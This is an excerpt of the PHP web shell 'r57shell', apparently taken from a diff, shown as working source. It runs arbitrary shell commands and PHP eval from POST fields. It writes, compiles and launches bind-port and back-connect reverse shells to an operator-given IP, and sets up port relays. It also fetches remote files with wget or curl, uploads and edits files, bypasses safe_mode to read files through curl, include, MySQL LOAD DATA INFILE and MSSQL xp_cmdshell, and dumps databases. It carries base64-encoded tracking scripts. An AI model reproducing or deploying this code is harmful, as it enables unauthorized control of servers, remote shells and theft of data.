+I7DQp2ZWMoJHJpbiwgZmlsZW5vKCRjaCksIDEpID0gMSBpZiAkY2g7DQp2ZWMoJHJpbiwgZmlsZW5vKCR0aCksIDEpID0gMSBpZiAkdGg7DQpteSgkc
+m91dCwgJGVvdXQpOw0Kc2VsZWN0KCRyb3V0ID0gJHJpbiwgdW5kZWYsICRlb3V0ID0gJHJpbiwgMTIwKTsNCmlmICghJHJvdXQgICYmICAhJGVvdXQp
+IHt9DQpteSAkY2J1ZmZlciA9ICIiOw0KbXkgJHRidWZmZXIgPSAiIjsNCmlmICgkY2ggJiYgKHZlYygkZW91dCwgZmlsZW5vKCRjaCksIDEpIHx8IHZ
+lYygkcm91dCwgZmlsZW5vKCRjaCksIDEpKSkgew0KbXkgJHJlc3VsdCA9IHN5c3JlYWQoJGNoLCAkdGJ1ZmZlciwgMTAyNCk7DQppZiAoIWRlZmluZW
+QoJHJlc3VsdCkpIHsNCnByaW50IFNUREVSUiAiJCFcbiI7DQpleGl0IDA7DQp9DQppZiAoJHJlc3VsdCA9PSAwKSB7IGV4aXQgMDsgfQ0KfQ0KaWYgK
+CR0aCAgJiYgICh2ZWMoJGVvdXQsIGZpbGVubygkdGgpLCAxKSAgfHwgdmVjKCRyb3V0LCBmaWxlbm8oJHRoKSwgMSkpKSB7DQpteSAkcmVzdWx0ID0g
+c3lzcmVhZCgkdGgsICRjYnVmZmVyLCAxMDI0KTsNCmlmICghZGVmaW5lZCgkcmVzdWx0KSkgeyBwcmludCBTVERFUlIgIiQhXG4iOyBleGl0IDA7IH0
+NCmlmICgkcmVzdWx0ID09IDApIHtleGl0IDA7fQ0KfQ0KaWYgKCRmaCAgJiYgICR0YnVmZmVyKSB7KHByaW50ICRmaCAkdGJ1ZmZlcik7fQ0Kd2hpbG
+UgKG15ICRsZW4gPSBsZW5ndGgoJHRidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJHRoLCAkdGJ1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+I
+DApIHskdGJ1ZmZlciA9IHN1YnN0cigkdGJ1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfQ0Kd2hpbGUgKG15ICRs
+ZW4gPSBsZW5ndGgoJGNidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJGNoLCAkY2J1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+IDApIHskY2J
+1ZmZlciA9IHN1YnN0cigkY2J1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfX19DQo=";
+$c1 = "PHNjcmlwdCBsYW5ndWFnZT0iamF2YXNjcmlwdCI+aG90bG9nX2pzPSIxLjAiO2hvdGxvZ19yPSIiK01hdGgucmFuZG9tKCkrIiZzPTgxNjA2
+JmltPTEmcj0iK2VzY2FwZShkb2N1bWVudC5yZWZlcnJlcikrIiZwZz0iK2VzY2FwZSh3aW5kb3cubG9jYXRpb24uaHJlZik7ZG9jdW1lbnQuY29va2l
+lPSJob3Rsb2c9MTsgcGF0aD0vIjsgaG90bG9nX3IrPSImYz0iKyhkb2N1bWVudC5jb29raWU/IlkiOiJOIik7PC9zY3JpcHQ+PHNjcmlwdCBsYW5ndW
+FnZT0iamF2YXNjcmlwdDEuMSI+aG90bG9nX2pzPSIxLjEiO2hvdGxvZ19yKz0iJmo9IisobmF2aWdhdG9yLmphdmFFbmFibGVkKCk/IlkiOiJOIik8L
+3NjcmlwdD48c2NyaXB0IGxhbmd1YWdlPSJqYXZhc2NyaXB0MS4yIj5ob3Rsb2dfanM9IjEuMiI7aG90bG9nX3IrPSImd2g9IitzY3JlZW4ud2lkdGgr
+J3gnK3NjcmVlbi5oZWlnaHQrIiZweD0iKygoKG5hdmlnYXRvci5hcHBOYW1lLnN1YnN0cmluZygwLDMpPT0iTWljIikpP3NjcmVlbi5jb2xvckRlcHR
+oOnNjcmVlbi5waXhlbERlcHRoKTwvc2NyaXB0PjxzY3JpcHQgbGFuZ3VhZ2U9ImphdmFzY3JpcHQxLjMiPmhvdGxvZ19qcz0iMS4zIjwvc2NyaXB0Pj
+xzY3JpcHQgbGFuZ3VhZ2U9ImphdmFzY3JpcHQiPmhvdGxvZ19yKz0iJmpzPSIraG90bG9nX2pzO2RvY3VtZW50LndyaXRlKCI8YSBocmVmPSdodHRwO
+i8vY2xpY2suaG90bG9nLnJ1Lz84MTYwNicgdGFyZ2V0PSdfdG9wJz48aW1nICIrIiBzcmM9J2h0dHA6Ly9oaXQ0LmhvdGxvZy5ydS9jZ2ktYmluL2hv
+dGxvZy9jb3VudD8iK2hvdGxvZ19yKyImJyBib3JkZXI9MCB3aWR0aD0xIGhlaWdodD0xIGFsdD0xPjwvYT4iKTwvc2NyaXB0Pjxub3NjcmlwdD48YSB
+ocmVmPWh0dHA6Ly9jbGljay5ob3Rsb2cucnUvPzgxNjA2IHRhcmdldD1fdG9wPjxpbWdzcmM9Imh0dHA6Ly9oaXQ0LmhvdGxvZy5ydS9jZ2ktYmluL2
+hvdGxvZy9jb3VudD9zPTgxNjA2JmltPTEiIGJvcmRlcj0wd2lkdGg9IjEiIGhlaWdodD0iMSIgYWx0PSJIb3RMb2ciPjwvYT48L25vc2NyaXB0Pg==";
+$c2 = "PCEtLUxpdmVJbnRlcm5ldCBjb3VudGVyLS0+PHNjcmlwdCBsYW5ndWFnZT0iSmF2YVNjcmlwdCI+PCEtLQ0KZG9jdW1lbnQud3JpdGUoJzxh
+IGhyZWY9Imh0dHA6Ly93d3cubGl2ZWludGVybmV0LnJ1L2NsaWNrIiAnKw0KJ3RhcmdldD1fYmxhbms+PGltZyBzcmM9Imh0dHA6Ly9jb3VudGVyLnl
+hZHJvLnJ1L2hpdD90NTIuNjtyJysNCmVzY2FwZShkb2N1bWVudC5yZWZlcnJlcikrKCh0eXBlb2Yoc2NyZWVuKT09J3VuZGVmaW5lZCcpPycnOg0KJz
+tzJytzY3JlZW4ud2lkdGgrJyonK3NjcmVlbi5oZWlnaHQrJyonKyhzY3JlZW4uY29sb3JEZXB0aD8NCnNjcmVlbi5jb2xvckRlcHRoOnNjcmVlbi5wa
+XhlbERlcHRoKSkrJzsnK01hdGgucmFuZG9tKCkrDQonIiBhbHQ9ImxpdmVpbnRlcm5ldC5ydTog7+7q4Ofg7e4g9+jx6+4g7/Du8ezu8vDu4iDoIO/u
+8eXy6PLl6+XpIOfgIDI0IPfg8eAiICcrDQonYm9yZGVyPTAgd2lkdGg9MCBoZWlnaHQ9MD48L2E+JykvLy0tPjwvc2NyaXB0PjwhLS0vTGl2ZUludGV
+ybmV0LS0+";
+echo $head;
+echo '</head>';
+if(empty($_POST['cmd'])) {
+$serv = array(127,192,172,10);
+$addr=@explode('.', $_SERVER['SERVER_ADDR']);
+$current_version = str_replace('.','',$version);
+if (!in_array($addr[0], $serv)) {
+@print "";
+@readfile ("");}}
+echo '<body bgcolor="#e4e0d8"><table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000>
+<tr><td bgcolor=#cccccc width=160><font face=Verdana size=2>'.ws(1).'&nbsp;
+<font face=Webdings size=6><b>!</b></font><b>'.ws(2).'r57shell '.$version.'</b>
+</font></td><td bgcolor=#cccccc><font face=Verdana size=-2>';
+echo ws(2);
+echo "<b>".date ("d-m-Y H:i:s")."</b>";
+echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?phpinfo title=\"".$lang[$language.'_text46']."\"><b>phpinfo</b></a> ".$rb;
+echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?phpini title=\"".$lang[$language.'_text47']."\"><b>php.ini</b></a> ".$rb;
+echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?cpu title=\"".$lang[$language.'_text50']."\"><b>cpu</b></a> ".$rb;
+echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?mem title=\"".$lang[$language.'_text51']."\"><b>mem</b></a> ".$rb;
+echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?tmp title=\"".$lang[$language.'_text48']."\"><b>tmp</b></a> ".$rb;
+echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?delete title=\"".$lang[$language.'_text49']."\"><b>delete</b></a> ".$rb."<br>";
+echo ws(2);
+echo (($safe_mode)?("safe_mode: <b><font color=green>ON</font></b>"):("safe_mode: <b><font color=red>OFF</font></b>"));
+echo ws(2);
+echo "PHP version: <b>".@phpversion()."</b>";
+$curl_on = @function_exists('curl_version');
+echo ws(2);
+echo "cURL: ".(($curl_on)?("<b><font color=green>ON</font></b>"):("<b><font color=red>OFF</font></b>"));
+echo ws(2);
+echo "MySQL: <b>";
+$mysql_on = @function_exists('mysql_connect');
+if($mysql_on){
+echo "<font color=green>ON</font></b>"; } else { echo "<font color=red>OFF</font></b>"; }
+echo ws(2);
+echo "MSSQL: <b>";
+$mssql_on = @function_exists('mssql_connect');
+if($mssql_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";}
+echo ws(2);
+echo "PostgreSQL: <b>";
+$pg_on = @function_exists('pg_connect');
+if($pg_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";}
+echo ws(2);
+echo "Oracle: <b>";
+$ora_on = @function_exists('ocilogon');
+if($ora_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";}
+echo "<br>".ws(2);
+echo "Disable functions : <b>";
+if(''==($df=@ini_get('disable_functions'))){echo "<font color=green>NONE</font></b>";}else{echo "<font color=red>$df</font></b>";}
+$free = @diskfreespace($dir);
+if (!$free) {$free = 0;}
+$all = @disk_total_space($dir);
+if (!$all) {$all = 0;}
+$used = $all-$free;
+$used_percent = @round(100/($all/$free),2);
+echo "<br>".ws(2)."HDD Free : <b>".view_size($free)."</b> HDD Total : <b>".view_size($all)."</b>";
+echo '</font></td></tr><table>
+<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000>
+<tr><td align=right width=100>';
+echo $font;
+if(!$windows){
+echo '<font color=blue><b>uname -a :'.ws(1).'<br>sysctl :'.ws(1).'<br>$OSTYPE :'.ws(1).'<br>Server :'.ws(1).'<br>id :'.ws(1).'<br>pwd :'.ws(1).'</b></font><br>';
+echo "</td><td>";
+echo "<font face=Verdana size=-2 color=red><b>";
+$uname = ex('uname -a');
+echo((!empty($uname))?(ws(3).@substr($uname,0,120)."<br>"):(ws(3).@substr(@php_uname(),0,120)."<br>"));
+if(!$safe_mode){
+$bsd1 = ex('sysctl -n kern.ostype');
+$bsd2 = ex('sysctl -n kern.osrelease');
+$lin1 = ex('sysctl -n kernel.ostype');
+$lin2 = ex('sysctl -n kernel.osrelease');
+}
+if (!empty($bsd1)&&!empty($bsd2)) { $sysctl = "$bsd1 $bsd2"; }
+else if (!empty($lin1)&&!empty($lin2)) {$sysctl = "$lin1 $lin2"; }
+else { $sysctl = "-"; }
+echo ws(3).$sysctl."<br>";
+echo ws(3).ex('echo $OSTYPE')."<br>";
+echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>";
+$id = ex('id');
+echo((!empty($id))?(ws(3).$id."<br>"):(ws(3)."user=".@get_current_user()." uid=".@getmyuid()." gid=".@getmygid()."<br>"));
+echo ws(3).$dir;
+echo "</b></font>";
+}
+else
+{
+echo '<font color=blue><b>OS :'.ws(1).'<br>Server :'.ws(1).'<br>User :'.ws(1).'<br>pwd :'.ws(1).'</b></font><br>';
+echo "</td><td>";
+echo "<font face=Verdana size=-2 color=red><b>";
+echo ws(3).@substr(@php_uname(),0,120)."<br>";
+echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>";
+echo ws(3).@get_current_user()."<br>";
+echo ws(3).$dir."<br>";
+echo "</font>";
+}
+echo "</font>";
+echo "</td></tr></table>";
+if(empty($c1)||empty($c2)) { die(); }
+$f = '<br>';
+$f .= base64_decode($c1);
+$f .= base64_decode($c2);
+if(!empty($_POST['cmd']) && $_POST['cmd'] == "find_text")
+{
+$_POST['cmd'] = 'find '.$_POST['s_dir'].' -name \''.$_POST['s_mask'].'\' | xargs grep -E \''.$_POST['s_text'].'\'';
+}
+if(!empty($_POST['cmd']) && $_POST['cmd']=="ch_")
+ {
+ switch($_POST['what'])
+   {
+   case 'own':
+   @chown($_POST['param1'],$_POST['param2']);
+   break;
+   case 'grp':
+   @chgrp($_POST['param1'],$_POST['param2']);
+   break;
+   case 'mod':
+   @chmod($_POST['param1'],intval($_POST['param2'], 8));
+   break;
+   }
+ $_POST['cmd']="";
+ }
+if(!empty($_POST['cmd']) && $_POST['cmd']=="mk")
+ {
+   switch($_POST['what'])
+   {
+     case 'file':
+      if($_POST['action'] == "create")
+       {
+       if(file_exists($_POST['mk_name']) || !$file=@fopen($_POST['mk_name'],"w")) { echo ce($_POST['mk_name']); $_POST['cmd']=""; }
+       else {
+        fclose($file);
+        $_POST['e_name'] = $_POST['mk_name'];
+        $_POST['cmd']="edit_file";
+        echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text61']."</b></font></div></td></tr></table>";
+        }
+       }
+       else if($_POST['action'] == "delete")
+       {
+       if(unlink($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text63']."</b></font></div></td></tr></table>";
+       $_POST['cmd']="";
+       }
+     break;
+     case 'dir':
+      if($_POST['action'] == "create"){
+      if(mkdir($_POST['mk_name']))
+       {
+         $_POST['cmd']="";
+         echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text62']."</b></font></div></td></tr></table>";
+       }
+      else { echo ce($_POST['mk_name']); $_POST['cmd']=""; }
+      }
+      else if($_POST['action'] == "delete"){
+      if(rmdir($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text64']."</b></font></div></td></tr></table>";
+      $_POST['cmd']="";
+      }
+     break;
+   }
+ }
+if(!empty($_POST['cmd']) && $_POST['cmd']=="edit_file")
+ {
+ if(!$file=@fopen($_POST['e_name'],"r+")) { $only_read = 1; @fclose($file); }
+ if(!$file=@fopen($_POST['e_name'],"r")) { echo re($_POST['e_name']); $_POST['cmd']=""; }
+ else {
+ echo $table_up3;
+ echo $font;
+ echo "<form name=save_file method=post>";
+ echo ws(3)."<b>".$_POST['e_name']."</b>";
+ echo "<div align=center><textarea name=e_text cols=121 rows=24>";
+ echo @htmlspecialchars(@fread($file,@filesize($_POST['e_name'])));
+ fclose($file);
+ echo "</textarea>";
+ echo "<input type=hidden name=e_name value=".$_POST['e_name'].">";
+ echo "<input type=hidden name=dir value=".$dir.">";
+ echo "<input type=hidden name=cmd value=save_file>";
+ echo (!empty($only_read)?("<br><br>".$lang[$language.'_text44']):("<br><br><input type=submit name=submit value=\" ".$lang[$language.'_butt10']." \">"));
+ echo "</div>";
+ echo "</font>";
+ echo "</form>";
+ echo "</td></tr></table>";
+ exit();
+ }
+ }
+if(!empty($_POST['cmd']) && $_POST['cmd']=="save_file")
+ {
+ if(!$file=@fopen($_POST['e_name'],"w")) { echo we($_POST['e_name']); }
+ else {
+ @fwrite($file,$_POST['e_text']);
+ @fclose($file);
+ $_POST['cmd']="";
+ echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text45']."</b></font></div></td></tr></table>";
+ }
+ }
+if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="C"))
+{
+ cf("/tmp/bd.c",$port_bind_bd_c);
+ $blah = ex("gcc -o /tmp/bd /tmp/bd.c");
+ @unlink("/tmp/bd.c");
+ $blah = ex("/tmp/bd ".$_POST['port']." ".$_POST['bind_pass']." &");
+ $_POST['cmd']="ps -aux | grep bd";
+}
+if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="Perl"))
+{
+ cf("/tmp/bdpl",$port_bind_bd_pl);
+ $p2=which("perl");
+ if(empty($p2)) $p2="perl";
+ $blah = ex($p2." /tmp/bdpl ".$_POST['port']." &");
+ $_POST['cmd']="ps -aux | grep bdpl";
+}
+if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="Perl"))
+{
+ cf("/tmp/back",$back_connect);
+ $p2=which("perl");
+ if(empty($p2)) $p2="perl";
+ $blah = ex($p2." /tmp/back ".$_POST['ip']." ".$_POST['port']." &");
+ $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\"";
+}
+if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="C"))
+{
+ cf("/tmp/back.c",$back_connect_c);
+ $blah = ex("gcc -o /tmp/backc /tmp/back.c");
+ @unlink("/tmp/back.c");
+ $blah = ex("/tmp/backc ".$_POST['ip']." ".$_POST['port']." &");
+ $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\"";
+}
+if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="Perl"))
+{
+ cf("/tmp/dp",$datapipe_pl);
+ $p2=which("perl");
+ if(empty($p2)) $p2="perl";
+ $blah = ex($p2." /tmp/dp ".$_POST['local_port']." ".$_POST['remote_host']." ".$_POST['remote_port']." &");
+ $_POST['cmd']="ps -aux | grep dp";
+}
+if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="C"))
+{
+ cf("/tmp/dpc.c",$datapipe_c);
+ $blah = ex("gcc -o /tmp/dpc /tmp/dpc.c");
+ @unlink("/tmp/dpc.c");
+ $blah = ex("/tmp/dpc ".$_POST['local_port']." ".$_POST['remote_port']." ".$_POST['remote_host']." &");
+ $_POST['cmd']="ps -aux | grep dpc";
+}
+if (!empty($_POST['alias'])){ foreach ($aliases as $alias_name=>$alias_cmd) { if ($_POST['alias'] == $alias_name){$_POST['cmd']=$alias_cmd;}}}
+if (!empty($HTTP_POST_FILES['userfile']['name']))
+{
+if(isset($_POST['nf1']) && !empty($_POST['new_name'])) { $nfn = $_POST['new_name']; }
+else { $nfn = $HTTP_POST_FILES['userfile']['name']; }
+@copy($HTTP_POST_FILES['userfile']['tmp_name'],
+            $_POST['dir']."/".$nfn)
+      or print("<font color=red face=Fixedsys><div align=center>Error uploading file ".$HTTP_POST_FILES['userfile']['name']."</div></font>");
+}
+if (!empty($_POST['with']) && !empty($_POST['rem_file']) && !empty($_POST['loc_file']))
+{
+ switch($_POST['with'])
+ {
+ case wget:
+ $_POST['cmd'] = which('wget')." ".$_POST['rem_file']." -O ".$_POST['loc_file']."";
+ break;
+ case fetch:
+ $_POST['cmd'] = which('fetch')." -p ".$_POST['rem_file']." -o ".$_POST['loc_file']."";
+ break;
+ case lynx:
+ $_POST['cmd'] = which('lynx')." -source ".$_POST['rem_file']." > ".$_POST['loc_file']."";
+ break;
+ case links:
+ $_POST['cmd'] = which('links')." -source ".$_POST['rem_file']." > ".$_POST['loc_file']."";
+ break;
+ case GET:
+ $_POST['cmd'] = which('GET')." ".$_POST['rem_file']." > ".$_POST['loc_file']."";
+ break;
+ case curl:
+ $_POST['cmd'] = which('curl')." ".$_POST['rem_file']." -o ".$_POST['loc_file']."";
+ break;
+ }
+}
+echo $table_up3;
+if (empty($_POST['cmd'])&&!$safe_mode) { $_POST['cmd']=($windows)?("dir"):("ls -lia"); }
+else if(empty($_POST['cmd'])&&$safe_mode){ $_POST['cmd']="safe_dir"; }
+echo $font.$lang[$language.'_text1'].": <b>".$_POST['cmd']."</b></font></td></tr><tr><td><b><div align=center><textarea name=report cols=121 rows=15>";
+if($safe_mode)
+{
+ switch($_POST['cmd'])
+ {
+ case 'safe_dir':
+  $d=@dir($dir);
+  if ($d)
+   {
+   while (false!==($file=$d->read()))
+    {
+     if ($file=="." || $file=="..") continue;
+     @clearstatcache();
+     list ($dev, $inode, $inodep, $nlink, $uid, $gid, $inodev, $size, $atime, $mtime, $ctime, $bsize) = stat($file);
+     if($windows){
+     echo date("d.m.Y H:i",$mtime);
+     if(@is_dir($file)) echo "  <DIR> "; else printf("% 7s ",$size);
+     }
+     else{
+     $owner = @posix_getpwuid($uid);
+     $grgid = @posix_getgrgid($gid);
+     echo $inode." ";
+     echo perms(@fileperms($file));
+     printf("% 4d % 9s % 9s %7s ",$nlink,$owner['name'],$grgid['name'],$size);
+     echo date("d.m.Y H:i ",$mtime);
+     }
+     echo "$file\n";
+    }
+   $d->close();
+   }
+  else echo $lang[$language._text29];
+ break;
+ case 'safe_file':
+  if(@is_file($_POST['file']))
+   {
+   $file = @file($_POST['file']);
+   if($file)
+    {
+    $c = @sizeof($file);
+    for($i=0;$i<$c;$i++) { echo htmlspecialchars($file[$i]); }
+    }
+   else echo $lang[$language._text29];
+   }
+  else echo $lang[$language._text31];
+  break;
+  case 'test1':
+  $ci = @curl_init("file://".$_POST['test1_file']."");
+  $cf = @curl_exec($ci);
+  echo $cf;
+  break;
+  case 'test2':
+  @include($_POST['test2_file']);
+  break;
+  case 'test3':
+  if(!isset($_POST['test3_port'])||empty($_POST['test3_port'])) { $_POST['test3_port'] = "3306"; }
+  $db = @mysql_connect('localhost:'.$_POST['test3_port'],$_POST['test3_ml'],$_POST['test3_mp']);
+  if($db)
+   {
+   if(@mysql_select_db($_POST['test3_md'],$db))
+    {
+     $sql = "DROP TABLE IF EXISTS temp_r57_table;";
+     @mysql_query($sql);
+     $sql = "CREATE TABLE `temp_r57_table` ( `file` LONGBLOB NOT NULL );";
+     @mysql_query($sql);
+     $sql = "LOAD DATA INFILE \"".$_POST['test3_file']."\" INTO TABLE temp_r57_table;";
+     @mysql_query($sql);
+     $sql = "SELECT * FROM temp_r57_table;";
+     $r = @mysql_query($sql);
+     while(($r_sql = @mysql_fetch_array($r))) { echo @htmlspecialchars($r_sql[0]); }
+     $sql = "DROP TABLE IF EXISTS temp_r57_table;";
+     @mysql_query($sql);
+    }
+    else echo "[-] ERROR! Can't select database";
+   @mysql_close($db);
+   }
+  else echo "[-] ERROR! Can't connect to mysql server";
+  break;
+  case 'test4':
+  if(!isset($_POST['test4_port'])||empty($_POST['test4_port'])) { $_POST['test4_port'] = "1433"; }
+  $db = @mssql_connect('localhost,'.$_POST['test4_port'],$_POST['test4_ml'],$_POST['test4_mp']);
+  if($db)
+   {
+   if(@mssql_select_db($_POST['test4_md'],$db))
+    {
+     @mssql_query("drop table r57_temp_table",$db);
+     @mssql_query("create table r57_temp_table ( string VARCHAR (500) NULL)",$db);
+     @mssql_query("insert into r57_temp_table EXEC master.dbo.xp_cmdshell '".$_POST['test4_file']."'",$db);
+     $res = mssql_query("select * from r57_temp_table",$db);
+     while(($row=@mssql_fetch_row($res)))
+      {
+      echo $row[0]."\r\n";
+      }
+    @mssql_query("drop table r57_temp_table",$db);
+    }
+    else echo "[-] ERROR! Can't select database";
+   @mssql_close($db);
+   }
+  else echo "[-] ERROR! Can't connect to MSSQL server";
+  break;
+ }
+}
+else if(($_POST['cmd']!="php_eval")&&($_POST['cmd']!="mysql_dump")&&($_POST['cmd']!="db_show")&&($_POST['cmd']!="db_query")){
+ $cmd_rep = ex($_POST['cmd']);
+ if($windows) { echo @htmlspecialchars(@convert_cyr_string($cmd_rep,'d','w'))."\n"; }
+ else { echo @htmlspecialchars($cmd_rep)."\n"; }}
+if ($_POST['cmd']=="php_eval"){
+ $eval = @str_replace("<?","",$_POST['php_eval']);
+ $eval = @str_replace("?>","",$eval);
+ @eval($eval);}
+if ($_POST['cmd']=="db_show")
+ {
+ switch($_POST['db'])
+ {
+ case 'MySQL':
+ if(empty($_POST['db_port'])) { $_POST['db_port'] = '3306'; }
+ $db = @mysql_connect('localhost:'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']);
+ if($db)
+   {
+   $res=@mysql_query("SHOW DATABASES", $db);
+   while(($row=@mysql_fetch_row($res)))
+    {
+     echo "[+] ".$row[0]."\r\n";
+     if(isset($_POST['st'])){
+     $res2 = @mysql_query("SHOW TABLES FROM ".$row[0],$db);
+     while(($row2=@mysql_fetch_row($res2)))
+      {
+      echo " | - ".$row2[0]."\r\n";
+      if(isset($_POST['sc']))
+       {
+       $res3 = @mysql_query("SHOW COLUMNS FROM ".$row[0].".".$row2[0],$db);
+       while(($row3=@mysql_fetch_row($res3))) { echo "   | - ".$row3[0]."\r\n"; }
+       }
+      }
+     }
+    }
+   @mysql_close($db);
+   }
+ else echo "[-] ERROR! Can't connect to MySQL server";
+ break;
+ case 'MSSQL':
+ if(empty($_POST['db_port'])) { $_POST['db_port'] = '1433'; }
+ $db = @mssql_connect('localhost,'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']);
+ if($db)
+   {
+   $res=@mssql_query("sp_databases", $db);
+   while(($row=@mssql_fetch_row($res)))
+    {
+     echo "[+] ".$row[0]."\r\n";
+     if(isset($_POST['st'])){
+     @mssql_select_db($row[0]);
+     $res2 = @mssql_query("sp_tables",$db);
+     while(($row2=@mssql_fetch_array($res2)))
+      {
+      if($row2['TABLE_TYPE'] == 'TABLE' && $row2['TABLE_NAME'] != 'dtproperties')
+      {
+      echo " | - ".$row2['TABLE_NAME']."\r\n";
+      if(isset($_POST['sc']))
+       {
+       $res3 = @mssql_query("sp_columns ".$row2[2],$db);
+       while(($row3=@mssql_fetch_array($res3))) { echo "   | - ".$row3['COLUMN_NAME']."\r\n"; }
+       }
+      }
+      }
+     }
+    }
+   @mssql_close($db);
+   }
+ else echo "[-] ERROR! Can't connect to MSSQL server";
+ break;
+ case 'PostgreSQL':
+ if(empty($_POST['db_port'])) { $_POST['db_port'] = '5432'; }
+  $str = "host='localhost' port='".$_POST['db_port']."' user='".$_POST['mysql_l']."' password='".$_POST['mysql_p']."' dbname='".$_POST['mysql_db']."'";
+  $db = @pg_connect($str);
+  if($db)
+  {
+  $res=@pg_query($db,"SELECT datname FROM pg_database WHERE datistemplate='f'");
+   while(($row=@pg_fetch_row($res)))
+    {
+     echo "[+] ".$row[0]."\r\n";
+    }
+  @pg_close($db);
+  }
+ else echo "[-] ERROR! Can't connect to PostgreSQL server";
+ break;
+ }
+ }
+if ($_POST['cmd']=="mysql_dump")
+ {
+  if(isset($_POST['dif'])) { $fp = @fopen($_POST['dif_name'], "w"); }
+  if((!empty($_POST['dif'])&&$fp)||(empty($_POST['dif']))){
+  $sqh  = "# homepage: http://\r\n";
+  $sqh .= "# ---------------------------------\r\n";
+  $sqh .= "#     date : ".date ("j F Y g:i")."\r\n";
+  $sqh .= "# database : ".$_POST['mysql_db']."\r\n";
+  $sqh .= "#    table : ".$_POST['mysql_tbl']."\r\n";
+  $sqh .= "# ---------------------------------\r\n\r\n";
+  switch($_POST['db']){
+  case 'MySQL':
+  if(empty($_POST['db_port'])) { $_POST['db_port'] = '3306'; }
+  $db = @mysql_connect('localhost:'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']);
+  if($db)
+   {
+   if(@mysql_select_db($_POST['mysql_db'],$db))
+    {
+     $sql1  = "# MySQL dump created by r57shell\r\n";
+     $sql1 .= $sqh;
+     $res   = @mysql_query("SHOW CREATE TABLE `".$_POST['mysql_tbl']."`", $db);
+     $row   = @mysql_fetch_row($res);
+     $sql1 .= $row[1]."\r\n\r\n";
+     $sql1 .= "# ---------------------------------\r\n\r\n";
+     $sql2 = '';
+     $res = @mysql_query("SELECT * FROM `".$_POST['mysql_tbl']."`", $db);
+     if (@mysql_num_rows($res) > 0) {
+     while (($row = @mysql_fetch_assoc($res))) {
+     $keys = @implode("`, `", @array_keys($row));
+     $values = @array_values($row);
+     foreach($values as $k=>$v) {$values[$k] = addslashes($v);}
+     $values = @implode("', '", $values);
+     $sql2 .= "INSERT INTO `".$_POST['mysql_tbl']."` (`".$keys."`) VALUES ('".htmlspecialchars($values)."');\r\n";
+     }
+     $sql2 .= "\r\n# ---------------------------------";
+     }
+    if(!empty($_POST['dif'])&&$fp) { @fputs($fp,$sql1.$sql2); }
+    else { echo $sql1.$sql2; }
+    }
+    else echo "[-] ERROR! Can't select database";
+   @mysql_close($db);
+   }
+  else echo "[-] ERROR! Can't connect to MySQL server";
+  break;
+  case 'MSSQL':
+  if(empty($_POST['db_port'])) { $_POST['db_port'] = '1433'; }
+  $db = @mssql_connect('localhost,'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']);
+  if($db)
+  {
+   if(@mssql_select_db($_POST['mysql_db'],$db))
+    {
+     $sql1  = "# MSSQL dump created by r57shell\r\n";
+     $sql1 .= $sqh;
+     $sql2 = '';
+     $res = @mssql_query("SELECT * FROM ".$_POST['mysql_tbl']."", $db);
+     if (@mssql_num_rows($res) > 0) {
+     while (($row = @mssql_fetch_assoc($res))) {
+     $keys = @implode(", ", @array_keys($row));
+     $values = @array_values($row);
+     foreach($values as $k=>$v) {$values[$k] = addslashes($v);}
+     $values = @implode("', '", $values);
+     $sql2 .= "INSERT INTO ".$_POST['mysql_tbl']." (".$keys.") VALUES ('".htmlspecialchars($values)."');\r\n";
+     }
+     $sql2 .= "\r\n# ---------------------------------";
+     }
+     if(!empty($_POST['dif'])&&$fp) { @fputs($fp,$sql1.$sql2); }
+     else { echo $sql1.$sql2; }
+    }
+   else echo "[-] ERROR! Can't select database";
+   @mssql_close($db);
+  }
+  else echo "[-] ERROR! Can't connect to MSSQL server";
+  break;
